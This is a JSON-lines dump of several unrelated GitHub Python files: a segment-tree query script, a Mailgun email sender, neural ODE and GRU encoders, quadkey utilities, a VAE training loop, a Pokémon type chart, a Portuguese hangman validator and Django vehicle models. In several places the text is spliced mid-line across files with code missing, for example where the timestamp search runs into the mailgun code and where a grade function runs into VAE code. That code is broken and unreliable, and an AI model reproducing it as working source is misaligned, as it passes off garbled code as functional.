mid = (l + r) // 2\r\n l = self.__query(leftchild, l, mid, i, j)\r\n r = self.__query(rightchild, mid + 1, r, i, j)\r\n if l is not None and r is not None:\r\n return SegmentTreeNode(l.sum+r.sum)\r\n elif l is None and r is None:\r\n return SegmentTreeNode(0)\r\n elif l is None:\r\n return SegmentTreeNode(r.sum)\r\n else:\r\n return SegmentTreeNode(l.sum)\r\n\r\n def query(self, i, j): \r\n return self.__query(1, 0, self.__leaf_length, i, j)\r\n\r\nclass MaxSegmentTreeNode:\r\n def __init__(self, v=[]):\r\n self.max = v\r\n def merge(self, left, right, k):\r\n if left is not None and right is not None:\r\n self.max = sorted(left.max + right.max)[-k:]\r\n elif left is None and right is None:\r\n self.max = []\r\n elif left is None:\r\n self.max = right.max\r\n else:\r\n self.max = left.max\r\n\r\nclass MaxSegmentTree:\r\n def __init__(self, a, k):\r\n n = len(a)\r\n power = math.ceil(math.log(n, 2))\r\n total = 2 ** (power + 1)\r\n self.__tree = [None] * int(total)\r\n self.__leaf_length = int(total/2)-1\r\n self.__build(1, 0, self.__leaf_length, a, k)\r\n\r\n def __build(self, node, l, r, a, k):\r\n if l == r:\r\n self.__tree[node] = MaxSegmentTreeNode()\r\n try:\r\n self.__tree[node].max = [a[l]]\r\n except IndexError:\r\n self.__tree[node].max = []\r\n return\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n self.__build(leftchild, l, mid, a, k)\r\n self.__build(rightchild, mid + 1, r, a, k)\r\n self.__tree[node] = MaxSegmentTreeNode()\r\n l = self.__tree[leftchild]\r\n r = self.__tree[rightchild]\r\n self.__tree[node].merge(l, r, k)\r\n\r\n def __query(self, node, l, r, i, j, k):\r\n if l >= i and r <= j:\r\n return self.__tree[node]\r\n elif j < l or i > 
r:\r\n return None\r\n else:\r\n leftchild = 2 * node\r\n rightchild = leftchild + 1\r\n mid = (l + r) // 2\r\n l = self.__query(leftchild, l, mid, i, j, k)\r\n r = self.__query(rightchild, mid + 1, r, i, j, k)\r\n if l is not None and r is not None:\r\n return MaxSegmentTreeNode(sorted(l.max+r.max)[-k:])\r\n elif l is None and r is None:\r\n return MaxSegmentTreeNode([])\r\n elif l is None:\r\n return MaxSegmentTreeNode(r.max)\r\n else:\r\n return MaxSegmentTreeNode(l.max)\r\n\r\n def query(self, i, j, k): \r\n return self.__query(1, 0, self.__leaf_length, i, j, k)\r\n \r\ndef get_start_index(time_stamp_list, l, r, time_stamp):\r\n \r\n if l==r or time_stamptime_stamp_list[r]:\r\n return -1\r\n mid = (l+r)//2\r\n if time_stamp == time_stamp_list[mid]:\r\n if mid >= 1 and time_stamp_list[mid-1]==time_stamp:\r\n return get_start_index(time_stamp_list, l, mid-1, time_stamp)\r\n else:\r\n return mid\r\n elif time_stamp < time_stamp_list[mid]:\r\n if (mid >=1 and time_stamp>time_stamp_list[mid-1]):\r\n return mid\r\n else:\r\n return get_start_index(time_stamp_list, l, mid-1, time_stamp)\r\n else:\r\n return get_start_index(time_stamp_list, mid+1, r, time_stamp)\r\n\r\ndef get_stop_index(time_stamp_list, l , r, time_stamp):\r\n if l==r or time_stamp>time_stamp_list[r]:\r\n return r\r\n if time_stamp < time_stamp_list[l]:\r\n return -1\r\n mid = (l+r)//2\r\n if time_stamp == time_stamp_list[mid]:\r\n if mid < r and time_stamp_list[mid+1]==time_stamp:\r\n return get_stop_index(time_stamp_list, mid+1, r, time_stamp)\r\n else:\r\n return mid\r\n elif time_stamp > time_stamp_list[mid]:\r\n if mid < r and time_stamp < time_stamp_list[mid+1]:\r\n return mid\r\n else:\r\n return get_stop_index(time_stamp_list, mid+1, r, time_stamp)\r\n else:\r\n return get_stop_index(time_stamp_list, l, mid-1, time_stamp)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nline1 = input().strip(' ').split(' ')\r\nnum_of_input = int(line1[1])\r\n\r\nSiFj = {}\r\nSiFj_timestamp = {}\r\nSiFj_linenum = {}\r\nSiFj_sum = {}\r\nSiFj_sum_segtree = {}\r\nSiFjk_max_segtree = {}\r\n\r\nSiFjFk = {}\r\nSiFjFk_timestamp = {}\r\nSiFjFk_sum = {}\r\nSiFjFk_sum_segtree = {}\r\n\r\n\r\nfor line_iterator in range(num_of_input):\r\n input_line = input().strip(' ').split(' ')\r\n num_of_items = len(input_line)\r\n time_stamp = int(input_line[0])\r\n symbol = input_line[1]\r\n iter = 2\r\n while iter\" % (from_name, from_field),\n \"to\": \"%s <%s>\" % (to_name, to_field),\n \"subject\": subject_field,\n \"text\": strip_tags(body_text)})\n\n def evaluate_timeout(self, response):\n if response.status_code != requests.codes.ok:\n self.timeout = True\n else:\n self.timeout = False\n","repo_name":"mylons/email_service","sub_path":"email_strategy/mailgun.py","file_name":"mailgun.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"11561566514","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nfrom torchdiffeq import odeint_adjoint as odeint\n\n\nclass Swish(nn.Module):\n \"\"\"Swish activation function.\n\n Implements swish activation function: https://arxiv.org/pdf/1710.05941.pdf.\n Claimed by NODE authors to perform well in NODEs.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize swish activation function.\"\"\"\n super(Swish, self).__init__()\n\n def forward(self, x, beta=1):\n \"\"\"Compute swish forward pass.\n\n Args:\n x (torch.Tensor): Input data.\n beta (float, optional): Scaling factor. 
Defaults to 1.\n\n Returns:\n torch.Tensor: Data with swish non-linearity applied.\n \"\"\"\n return x * torch.sigmoid(beta * x)\n\n\nACTIVATION_DICT = {\n 'Swish': Swish,\n 'Tanh': nn.Tanh,\n 'ReLU': nn.ReLU,\n 'Softplus': nn.Softplus\n}\n\n\nclass FCNN(nn.Module):\n \"\"\"Generic fully connected MLP.\n\n Attributes:\n act (nn.Module): Activation function to use between layers.\n fc_in (nn.Module): Linear layer mapping input to hidden state.\n fc_out (nn.Module): Linear layer mapping hidden state to output.\n fc_hidden (nn.ModuleList): Hidden layers.\n \"\"\"\n\n def __init__(self, input_dim, n_hidden, n_layer, act_type, output_dim=None):\n \"\"\"Initialize NN representing ODE function.\n\n Args:\n input_dim (int): Dimension of input data.\n n_hidden (int): Number of hidden units in NN.\n n_layer (int): Number of layers in NN.\n act_type (string): Type of activation to use between layers.\n output_dim (int): Dimension of NN output; defaults to input_dim\n\n Raises:\n ValueError: Thrown when activation function is unknown.\n \"\"\"\n super().__init__()\n\n output_dim = input_dim if output_dim is None else output_dim\n\n self.fc_in = nn.Linear(input_dim, n_hidden)\n self.fc_out = nn.Linear(n_hidden, output_dim)\n\n layers = [nn.Linear(n_hidden, n_hidden) for _ in range(n_layer-1)]\n self.fc_hidden = nn.ModuleList(layers)\n\n try:\n self.act = ACTIVATION_DICT[act_type]()\n except KeyError:\n raise ValueError(\"Unsupported activation function.\")\n\n def forward(self, x):\n \"\"\"Compute forward pass.\n\n Args:\n x (torch.Tensor): Data observations.\n\n Returns:\n torch.Tensor: Output of forward pass.\n \"\"\"\n h = self.fc_in(x)\n h = self.act(h)\n\n for layer in self.fc_hidden:\n h = layer(h)\n h = self.act(h)\n\n out = self.fc_out(h)\n return out\n\n\nclass GRU(nn.Module):\n \"\"\"Gated Recurrent Unit.\n\n Implementation is borrowed from https://github.com/YuliaRubanova/latent_ode\n which in turn uses http://www.wildml.com/2015/10/recurrent-neural-network-\n tutorial-part-4-implementing-a-grulstm-rnn-with-python-and-theano/\n \"\"\"\n\n def __init__(self, input_dim, latent_dim, n_units=100):\n \"\"\"Initialize GRU.\n\n Args:\n input_dim (int): Dimension of input.\n latent_dim (int): Dimension of latent state.\n n_units (int, optional): Number of GRU units.\n \"\"\"\n super(GRU, self).__init__()\n\n self.update_gate = nn.Sequential(\n nn.Linear(latent_dim + input_dim, n_units),\n nn.Tanh(),\n nn.Linear(n_units, latent_dim),\n nn.Sigmoid())\n self.init_network(self.update_gate)\n\n self.reset_gate = nn.Sequential(\n nn.Linear(latent_dim + input_dim, n_units),\n nn.Tanh(),\n nn.Linear(n_units, latent_dim),\n nn.Sigmoid())\n self.init_network(self.reset_gate)\n\n self.new_state_net = nn.Sequential(\n nn.Linear(latent_dim + input_dim, n_units),\n nn.Tanh(),\n nn.Linear(n_units, latent_dim))\n self.init_network(self.new_state_net)\n\n def forward(self, x, h):\n \"\"\"Compute GRU forward pass.\n\n Args:\n x (torch.Tensor): Input date for specific time point.\n h (torch.Tensor): Previous hidden state.\n Returns:\n torch.Tensor: Updated hidden state.\n \"\"\"\n input_concat = torch.cat([h, x], -1)\n\n update_gate = self.update_gate(input_concat)\n reset_gate = self.reset_gate(input_concat)\n\n concat = torch.cat([h * reset_gate, x], -1)\n\n new_state = self.new_state_net(concat)\n\n new_y = (1 - update_gate) * new_state + update_gate * h\n\n return new_y\n\n @staticmethod\n def init_network(net):\n \"\"\"Initialize network using normal distribution.\n\n Args:\n net (nn.Module): NN to initialize.\n 
\"\"\"\n for module in net.modules():\n if isinstance(module, nn.Linear):\n nn.init.normal_(module.weight, mean=0, std=0.1)\n nn.init.constant_(module.bias, val=0)\n\n\nclass EncoderAR(nn.Module):\n def __init__(self):\n super().__init__()\n\n def forward(self, x, tp, lens, args):\n args = args['aug_args']\n samp_ind = self.generate_samp_mask(x, args['s_min'], args['s_frac'])\n\n hid_arr = self._forward_impl(x, tp, lens, samp_ind, args['samp_prob'])\n out = self.select_by_length(hid_arr, np.array(lens))\n return out\n\n def predict(self, x, tp, lens, args):\n args = args['aug_args']\n samp_ind = self.generate_samp_mask(x, args['s_min'], args['s_frac'])\n\n hid_arr = self._forward_impl(x, tp, lens, samp_ind, 0)\n out = self.select_by_length(hid_arr, np.array(lens))\n return out\n\n def _forward_impl(self, x, tp, lens, samp_ind, samp_prob):\n raise NotImplementedError\n\n @staticmethod\n def generate_samp_mask(x, extrap_min, samp_frac):\n # Generate mask for training.\n # Points after extrapolation region index are all sampled.\n minimum_ind = int(x.size(1) * extrap_min)\n extrap_ind = np.random.randint(minimum_ind, x.size(1))\n\n valid_inds = np.arange(extrap_ind)\n n_inds = int(samp_frac * extrap_ind)\n\n samp_inds = np.sort(np.random.choice(valid_inds, n_inds, replace=False))\n\n return samp_inds\n\n @staticmethod\n def select_by_length(hid_array, lengths):\n # Used to select output from GRU output array.\n mask = torch.zeros(hid_array.size()).bool().to(hid_array.device)\n for i in range(len(mask)):\n mask[i, :lengths[i], :] = 1\n return hid_array.masked_select(mask).view(-1, hid_array.size(2))\n\n @staticmethod\n def get_longest_tp(tps, lens):\n ind = np.argmax(np.array(lens))\n return tps[ind]\n\n\nclass EncoderGRU(EncoderAR):\n def __init__(self, hidden_dim, rec_gru, rec_output, delta_t=True):\n super().__init__()\n\n self.gru = rec_gru\n self.out = rec_output\n self.hidden_dim = hidden_dim\n self.delta_t = delta_t\n\n def _forward_impl(self, x, tp, lens, samp_ind, samp_prob):\n seq_len = max(lens)\n\n if self.delta_t:\n delta = self.generate_delta(tp)\n x = torch.cat([x, delta], dim=2)\n\n h = torch.zeros(x.shape[0], self.hidden_dim).to(x.device)\n h_arr = torch.zeros(x.shape[0], seq_len, h.size(1)).to(x.device)\n\n for i in range(seq_len):\n if i not in samp_ind and np.random.uniform(0, 1) >= samp_prob:\n prev_out = self.out(h.unsqueeze(1)).view(x.shape[0], -1)\n\n if self.delta_t:\n # Append time delta\n prev_out = torch.cat([prev_out, x[:, i, -1:]], dim=-1)\n h = self.gru(prev_out, h)\n else:\n h = self.gru(x[:, i, :], h)\n\n h_arr[:, i, :] = h\n\n return self.out(h_arr)\n\n @staticmethod\n def generate_delta(tp):\n tp_start = torch.Tensor([0] * tp.size(0)).unsqueeze(1).float()\n tp_start = tp_start.to(tp.device)\n offset = torch.cat((tp_start, tp), dim=1)[:, :-1]\n delta = tp - offset\n return delta.unsqueeze(-1)\n\n\nclass EncoderGRUODE(EncoderAR):\n def __init__(self, latent_dim, rec_gru, rec_node, rec_output):\n super().__init__()\n\n self.gru = rec_gru\n self.node = rec_node\n self.out = rec_output\n self.latent_dim = latent_dim\n\n def _forward_impl(self, x, tp, lens, samp_ind, samp_prob):\n seq_len = max(lens)\n\n h = torch.zeros(x.size(0), self.latent_dim).to(x.device)\n h_arr = torch.zeros(x.size(0), seq_len, h.size(1)).to(x.device)\n\n tp = self.get_longest_tp(tp, lens)\n tp = torch.cat(((tp[0] - 0.01).unsqueeze(0), tp))\n\n for i in range(seq_len):\n h_ode = odeint(self.node, h, tp[i:i + 2])[1]\n if i not in samp_ind and np.random.uniform(0, 1) >= samp_prob:\n prev_out = 
self.out(h.unsqueeze(1)).view(x.size(0), -1)\n h = self.gru(prev_out, h_ode)\n else:\n h = self.gru(x[:, i, :], h_ode)\n h_arr[:, i, :] = h\n\n return self.out(h_arr)\n","repo_name":"IanShi1996/LatentSegmentedODE","sub_path":"baseline_models.py","file_name":"baseline_models.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31224498113","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 3 12:32:17 2020\n\n@author: hamishgibbs\n\"\"\"\n\nimport pandas as pd\nfrom pyquadkey2 import quadkey\nfrom shapely.geometry import Polygon\n\ndef preprocess_population(fn):\n df = pd.read_csv(fn)\n df['quadkey'] = df['quadkey'].apply(lambda x: '{0:0>13}'.format(x)) \n df['n_crisis'] = pd.to_numeric(df['n_crisis'], errors = 'coerce')\n df['n_baseline'] = pd.to_numeric(df['n_baseline'], errors = 'coerce')\n \n return(df) \n\ndef tile_polygon(qk):\n \n qk = quadkey.QuadKey(str(qk))\n \n a1 = qk.to_geo(anchor = 1)\n a2 = qk.to_geo(anchor = 2)\n a3 = qk.to_geo(anchor = 3)\n a4 = qk.to_geo(anchor = 5) \n \n bottom_l = [a1[1], a1[0]]\n bottom_r = [a4[1], a4[0]]\n top_l = [a3[1], a3[0]]\n top_r = [a2[1], a2[0]]\n \n return(Polygon([bottom_l, bottom_r, top_r, top_l]))\n\n\ndef tile_centroid(qk):\n \n p = tile_polygon(qk).centroid\n \n return(p)","repo_name":"hamishgibbs/facebook_mobility_uk","sub_path":"src/data/TilePopulation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"158944423","text":"def avg(arr):\n sum=0\n for i in range(len(arr)):\n sum+=arr[i]\n ans=sum/len(arr)\n return ans\ndef highlow(arr):\n min=arr[0]\n max=0\n for i in range(len(arr)):\n if(min>arr[i]):\n min=arr[i]\n if(max= delta).sum().item(), au_var\n\ndef visualize_latent(args, vae, device, test_data):\n f = open('yelp_embeddings_z','w')\n g = open('yelp_embeddings_labels','w')\n\n test_data_batch, test_label_batch = test_data.create_data_batch_labels(batch_size=args.batch_size, device=device, batch_first=True)\n for i in range(len(test_data_batch)):\n batch_data = test_data_batch[i]\n batch_label = test_label_batch[i]\n batch_size, sent_len = batch_data.size()\n means, _ = vae.encoder.forward(batch_data)\n for i in range(batch_size):\n mean = means[i,:].cpu().detach().numpy().tolist()\n for val in mean:\n f.write(str(val)+'\\t')\n f.write('\\n')\n for label in batch_label:\n g.write(label+'\\n')\n # fo\n print(mean.size())\n print(logvar.size())\n # fooo\n\ndef divider():\n print(\"----------------------------------------------\")\n\n\n###############################################\n# MAIN TRAINING LOOP #\n###############################################\n\ndef main(args):\n divider()\n print(\"Using args:\")\n print(args)\n divider()\n\n # select device and signal if using cuda or no\n device = torch.device(\"cuda\" if args.cuda else \"cpu\")\n args.device = device\n if args.cuda:\n print('Using cuda')\n \n # prepare dataset, splits, and vocab\n data, vocab = create_corpus(args)\n args.vocab_size = len(vocab)\n train_data, val_data, test_data = data\n \n # create model\n vae = create_model(args, vocab)\n divider()\n print(\"Model:\")\n print(vae)\n divider()\n \n if args.eval:\n print('begin evaluation')\n vae.load_state_dict(torch.load(args.load_path))\n vae.eval()\n with torch.no_grad():\n test_data_batch = test_data.create_data_batch(batch_size=args.batch_size,\n 
device=device,\n batch_first=True)\n\n test(vae, test_data_batch, \"TEST\", args)\n au, au_var = calc_au(vae, test_data_batch)\n print(\"%d active units\" % au)\n # print(au_var)\n\n test_data_batch = test_data.create_data_batch(batch_size=1,\n device=device,\n batch_first=True)\n calc_iwnll(vae, test_data_batch, args)\n\n return\n\n # miscellaneous initializations\n log_niter = (len(train_data)//args.batch_size)//10\n opt_dict = {\"not_improved\": 0, \"lr\": 1., \"best_loss\": 1e4}\n enc_optimizer = optim.SGD(vae.encoder.parameters(), lr=1.0, momentum=args.momentum)\n dec_optimizer = optim.SGD(vae.decoder.parameters(), lr=1.0, momentum=args.momentum)\n opt_dict['lr'] = 1.0\n iter_ = decay_cnt = 0\n best_loss = 1e4\n best_kl = best_nll = best_ppl = 0\n pre_mi = 0\n aggressive_flag = True if args.aggressive else False\n vae.train()\n start = time.time()\n kl_weight = args.kl_start\n anneal_rate = (1.0 - args.kl_start) / (args.warm_up * (len(train_data) / args.batch_size))\n\n # put data in batches\n train_data_batch = train_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n\n val_data_batch = val_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n\n test_data_batch = test_data.create_data_batch(batch_size=args.batch_size,\n device=device,\n batch_first=True)\n \n # begin the training loop\n print(\"Beginning training ...\")\n for epoch in range(args.epochs):\n print(\"Epoch %d:\" % epoch)\n report_kl_loss = report_rec_loss = 0\n report_num_words = report_num_sents = 0\n for i in np.random.permutation(len(train_data_batch)):\n batch_data = train_data_batch[i]\n batch_size, sent_len = batch_data.size()\n\n # not predict start symbol\n report_num_words += (sent_len - 1) * batch_size\n\n report_num_sents += batch_size\n\n # kl_weight = 1.0\n kl_weight = min(1.0, kl_weight + anneal_rate)\n\n sub_iter = 1\n batch_data_enc = batch_data\n burn_num_words = 0\n burn_pre_loss = 1e4\n burn_cur_loss = 0\n while aggressive_flag and sub_iter < 100:\n\n enc_optimizer.zero_grad()\n dec_optimizer.zero_grad()\n\n burn_batch_size, burn_sents_len = batch_data_enc.size()\n burn_num_words += (burn_sents_len - 1) * burn_batch_size\n\n loss, loss_rc, loss_kl = vae.loss(batch_data_enc, kl_weight, nsamples=args.nsamples)\n\n burn_cur_loss += loss.sum().item()\n loss = loss.mean(dim=-1)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(vae.parameters(), clip_grad)\n\n enc_optimizer.step()\n\n id_ = np.random.random_integers(0, len(train_data_batch) - 1)\n\n batch_data_enc = train_data_batch[id_]\n\n # every 15 iterations, check if the \n if sub_iter % 15 == 0:\n burn_cur_loss = burn_cur_loss / burn_num_words\n if burn_pre_loss - burn_cur_loss < 0:\n break\n burn_pre_loss = burn_cur_loss\n burn_cur_loss = burn_num_words = 0\n\n sub_iter += 1\n\n # if sub_iter >= 30:\n # break\n\n # print(sub_iter)\n\n enc_optimizer.zero_grad()\n dec_optimizer.zero_grad()\n\n\n loss, loss_rc, loss_kl = vae.loss(batch_data, kl_weight, nsamples=args.nsamples)\n\n loss = loss.mean(dim=-1)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(vae.parameters(), clip_grad)\n\n loss_rc = loss_rc.sum()\n loss_kl = loss_kl.sum()\n\n if not aggressive_flag:\n enc_optimizer.step()\n\n dec_optimizer.step()\n\n report_rec_loss += loss_rc.item()\n report_kl_loss += loss_kl.item()\n\n if iter_ % log_niter == 0:\n train_loss = (report_rec_loss + report_kl_loss) / report_num_sents\n if aggressive_flag or epoch == 0:\n vae.eval()\n with torch.no_grad():\n mi = calc_mi(vae, 
val_data_batch)\n au, _ = calc_au(vae, val_data_batch)\n vae.train()\n\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, mi: %.4f, recon: %.4f,' \\\n ' au %d, time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_sents, mi,\n report_rec_loss / report_num_sents, au, time.time() - start))\n else:\n print('epoch: %d, iter: %d, avg_loss: %.4f, kl: %.4f, recon: %.4f,' \\\n 'time elapsed %.2fs' %\n (epoch, iter_, train_loss, report_kl_loss / report_num_sents,\n report_rec_loss / report_num_sents, time.time() - start))\n\n sys.stdout.flush()\n\n report_rec_loss = report_kl_loss = 0\n report_num_words = report_num_sents = 0\n\n iter_ += 1\n\n if aggressive_flag and (iter_ % len(train_data_batch)) == 0:\n vae.eval()\n cur_mi = calc_mi(vae, val_data_batch)\n vae.train()\n print(\"pre mi:%.4f. cur mi:%.4f\" % (pre_mi, cur_mi))\n if cur_mi - pre_mi < 0:\n aggressive_flag = False\n print(\"STOP BURNING\")\n\n pre_mi = cur_mi\n\n print('kl weight %.4f' % kl_weight)\n\n vae.eval()\n with torch.no_grad():\n loss, nll, kl, ppl, mi = test(vae, val_data_batch, \"VAL\", args)\n au, au_var = calc_au(vae, val_data_batch)\n print(\"%d active units\" % au)\n # print(au_var)\n\n if loss < best_loss:\n print('update best loss')\n best_loss = loss\n best_nll = nll\n best_kl = kl\n best_ppl = ppl\n torch.save(vae.state_dict(), args.save_path)\n\n if loss > opt_dict[\"best_loss\"]:\n opt_dict[\"not_improved\"] += 1\n if opt_dict[\"not_improved\"] >= decay_epoch and epoch >=15:\n opt_dict[\"best_loss\"] = loss\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"lr\"] = opt_dict[\"lr\"] * lr_decay\n vae.load_state_dict(torch.load(args.save_path))\n print('new lr: %f' % opt_dict[\"lr\"])\n decay_cnt += 1\n enc_optimizer = optim.SGD(vae.encoder.parameters(), lr=opt_dict[\"lr\"], momentum=args.momentum)\n dec_optimizer = optim.SGD(vae.decoder.parameters(), lr=opt_dict[\"lr\"], momentum=args.momentum)\n \n else:\n opt_dict[\"not_improved\"] = 0\n opt_dict[\"best_loss\"] = loss\n\n if decay_cnt == max_decay:\n break\n\n if epoch % args.test_nepoch == 0:\n with torch.no_grad():\n loss, nll, kl, ppl, _ = test(vae, test_data_batch, \"TEST\", args)\n\n if epoch % args.sample_every == 0:\n print(\"Generating samples for epoch #{} ...\".format(epoch + 1))\n test_generation(vae, vocab, args, epoch)\n print(\"... 
sample generation successful\")\n \n vae.train()\n\n # compute importance weighted estimate of log p(x)\n vae.load_state_dict(torch.load(args.save_path))\n\n vae.eval()\n with torch.no_grad():\n loss, nll, kl, ppl, _ = test(vae, test_data_batch, \"TEST\", args)\n au, au_var = calc_au(vae, test_data_batch)\n print(\"%d active units\" % au)\n # print(au_var)\n\n test_data_batch = test_data.create_data_batch(batch_size=1,\n device=device,\n batch_first=True)\n with torch.no_grad():\n calc_iwnll(vae, test_data_batch, args)\n\nif __name__ == '__main__':\n args = init_config()\n main(args)\n","repo_name":"sbarham/lv-nlm-he-2019","sub_path":".ipynb_checkpoints/text-checkpoint.py","file_name":"text-checkpoint.py","file_ext":"py","file_size_in_byte":17434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32605931552","text":"strongTo = {\n 'normal' : ['ghost*'],\n 'fire' : ['steel', 'fire', 'grass', 'ice', 'bug', 'fairy'],\n 'water' : ['fire', 'water', 'ice', 'steel'],\n 'grass' : ['water', 'grass', 'electric', 'ground'],\n 'electric' : ['electric', 'flying', 'steel'],\n 'flying' : ['ground*', 'grass', 'fighting', 'bug'],\n 'ground' : ['electric*', 'rock', 'poison'],\n 'rock' : ['poison', 'normal', 'fire', 'flying'],\n 'fighting' : ['dark', 'rock', 'bug'],\n 'ice' : ['ice'],\n 'poison' : ['poison', 'bug', 'fairy', 'fighting', 'grass'],\n 'bug' : ['fighting', 'grass', 'ground'],\n 'ghost' : ['normal*', 'fighting*', 'poison', 'bug'],\n 'psychic' : ['psychic', 'fighting'],\n 'dragon' : ['electric', 'fire', 'water', 'grass'],\n 'dark' : ['psychic*', 'dark', 'ghost'],\n 'fairy' : ['dragon*', 'dark', 'fighting', 'bug'],\n 'steel' : ['ice', 'normal', 'grass', 'flying', 'rock', 'poison*', 'psychic', 'dragon', 'fairy', 'steel', 'bug']\n}\n\nweakTo = {\n 'normal' : ['fighting'],\n 'fire' : ['water', 'ground', 'rock'],\n 'water' : ['grass', 'electric'],\n 'grass' : ['fire', 'flying', 'ice', 'poison', 'bug'],\n 'electric' : ['ground'],\n 'flying' : ['electric', 'rock', 'ice'],\n 'ground' : ['water', 'grass', 'ice'],\n 'rock' : ['water', 'grass', 'ground', 'fighting', 'steel'],\n 'fighting' : ['flying', 'psychic', 'fairy'],\n 'ice' : ['fire', 'rock', 'fighting', 'steel'],\n 'poison' : ['ground', 'psychic'],\n 'bug' : ['fire', 'flying', 'rock'],\n 'ghost' : ['ghost', 'dark'],\n 'psychic' : ['bug', 'ghost', 'dark'],\n 'dragon' : ['ice', 'dragon', 'fairy'],\n 'dark' : ['fighting', 'bug', 'fairy'],\n 'fairy' : ['poison', 'steel'],\n 'steel' : ['fire', 'ground', 'fighting']\n}\n\ndef getWeakness(t):\n if t in weakTo.keys():\n return weakTo[t]\n else:\n return []\n\ndef getStrength(t):\n if t in strongTo.keys():\n return strongTo[t]\n else:\n return []\n\ndef main():\n t = input('enter type: ')\n while t:\n print('\\nWeak to:')\n for x in getWeakness(t):\n print(' -', x)\n print('\\n* indicates immunity')\n print('Resistant to:')\n for x in getStrength(t):\n print(' +', x)\n t = input('\\nenter type: ')\n\nif __name__=='__main__':\n main()","repo_name":"devmart10/dev","sub_path":"python/pokemon/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42472181835","text":"def Valida_Palavra_Desafiador(vDesafiado):\n verPalavra = ''\n vMsg = ''\n while True:\n print('Ao digitar uma palavra composta, irá ser subtituído o ESPAÇO por HÍFEN')\n verPalavra = input(f'Escolha a palavra que deseja que o jogador {vDesafiado} advinhe.\\n')\n 
if len(verPalavra) <= 1:\n            print(f'A palavra deve conter mais que \"UMA\" letra')\n        else:\n            verPalavra = Ajusta_Palavra_Composta(verPalavra)\n            if Validate_Palavra(verPalavra, 'S'):\n                break\n    return verPalavra\n\ndef Validate_Palavra(Palavra: str, Mostra_Msg='N', Valida_Hifen='N'):\n    condicao = '()*&¨%$#@!¹²³£¢¬:><.,^~][´`_=+/?|\\ }{ùúàáãõóòìíçÙÚÀÁÃÕÓÒÌÍÇ123456789' if Valida_Hifen == 'N' else '()*&¨%$#@!¹²³£¢¬:><.,^~][´`_=+/?|\\ }{ùúàáãõóòìíçÙÚÀÁÃÕÓÒÌÍÇ123456789-'\n\n    # reject the word if any of its characters is in the forbidden set\n    if any(ch in condicao for ch in Palavra):\n        if Mostra_Msg == 'S':\n            if Valida_Hifen == 'N':\n                print('Por favor informe apenas letras! Único caracter além das letras que é permitido é o HÍFEN')\n            else:\n                print('Por favor informe apenas letras!')\n        return False\n    else:\n        return True\n\ndef Ajusta_Palavra_Composta(Palavra):\n    return Palavra.replace(' ', '-')","repo_name":"lucasdeazandona/Jogo_Da_Forca","sub_path":"ValidaPalavra/ValidacaoPalavras.py","file_name":"ValidacaoPalavras.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17518351014","text":"from django.conf import settings\nfrom django.db import models\n\n\n# Create your models here.\nclass Car(models.Model):\n    objects = None\n\n    title = models.CharField(max_length=100, verbose_name='название')  # Поле для названия (максимум 100 символов)\n    description = models.TextField(verbose_name='описание')  # Поле для описания (текстовое поле)\n    owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True, blank=True)\n    amount = models.IntegerField(default=1000, verbose_name=\"Цена\")\n\n    def __str__(self):\n        return self.title\n\n    class Meta:\n        verbose_name = 'Машина'\n        verbose_name_plural = 'Машины'\n\n\nclass Moto(models.Model):\n    objects = None\n\n    title = models.CharField(max_length=100, verbose_name='название')  # Поле для названия (максимум 100 символов)\n    description = models.TextField(verbose_name='описание')  # Поле для описания (текстовое поле)\n    owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, null=True, blank=True)\n\n\n    def __str__(self):\n        return self.title\n\n    class Meta:\n        verbose_name = 'Мотоцикл'\n        verbose_name_plural = 'Мотоциклы'\n\n\nclass Milage(models.Model):\n    objects = None\n    car = models.ForeignKey(Car, on_delete=models.CASCADE, null=True, blank=True, related_name='milage')\n    moto = models.ForeignKey(Moto, on_delete=models.CASCADE, null=True, blank=True, related_name='milage')\n\n    milage = models.PositiveIntegerField(verbose_name='Пробег')\n    year = models.PositiveSmallIntegerField(verbose_name='Год регистрации')\n\n    def __str__(self):\n        return f'{self.moto if self.moto else self.car} - {self.year}'\n\n    class Meta:\n        verbose_name = 'Пробег'\n        verbose_name_plural = 'Пробег'\n        ordering = ('-year',)\n","repo_name":"Lekantrop74/Sky_Pro_Lesson_24_26","sub_path":"vehicle/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
